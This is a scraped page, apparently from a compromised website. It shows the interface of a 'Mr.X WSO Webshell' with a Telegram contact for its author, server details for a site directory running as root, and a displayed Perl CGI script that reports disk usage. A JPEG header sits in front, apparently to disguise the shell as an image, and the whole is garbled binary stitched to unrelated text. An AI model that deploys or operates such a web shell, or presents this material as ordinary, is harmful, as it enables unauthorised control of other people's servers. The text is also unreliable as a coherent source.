����JFIF���������
| Attention: Uname: Php: Hdd: Cwd: | Mr.X WSO Webshell! - Personal WEB SHELL Mr.X BYPASS! V2.5 Telegram: @jackleet 5.3.29 Safe mode: OFF Datetime: 2026-04-09 15:58:40 1999.30 GB Free: 70.53 GB (3%) /home/httpd/html/stoptube.com/ drwxr-xr-x [ root ] [ home ] Text | Server IP: 127.0.0.54 Client IP: 216.73.216.53 |
| [ Files ] | [ Logout ] |
|---|
#!/usr/bin/perl
require "./cgi-lib.pl";
$userinfo="/web/sites/stats/global/domaininfo";
$bodyfile="/web/sites/stats/global/bodyfile";
$cgiurl = $ENV{'SCRIPT_NAME'};
$pwd=`/bin/pwd`;
@path=split(/\//, $pwd);
$username=($path[3]);
&ReadParse(*input);
print &PrintHeader;
$cgiurl = $ENV{'SCRIPT_NAME'};
$du=`/usr/bin/du -s /web/sites/$username`;
($used,$junk)=split(/\s+/,$du);
$mbused = ($used / 1000);
$mbused = sprintf("%.1f", $mbused);
print <<EOF;
<html>
<head>
<title>Disk space used</title>
<body bgcolor="white">
<center>
<font face="verdana,arial">Your account of</font><font face="verdana,arial" color="red">
$username</font><font face="verdana,arial"> is using a total of </font>
<font face="verdana,arial" color="red">$mbused MBs</font>
<font face="verdana,arial">of disk space.<p>
To see what your allowable disk space is, please check the pricing page at<br>
<a href="http://national-net.com/pricing.html">http://national-net.com/pricing.html</a>
</font>
</body>
</html>
EOF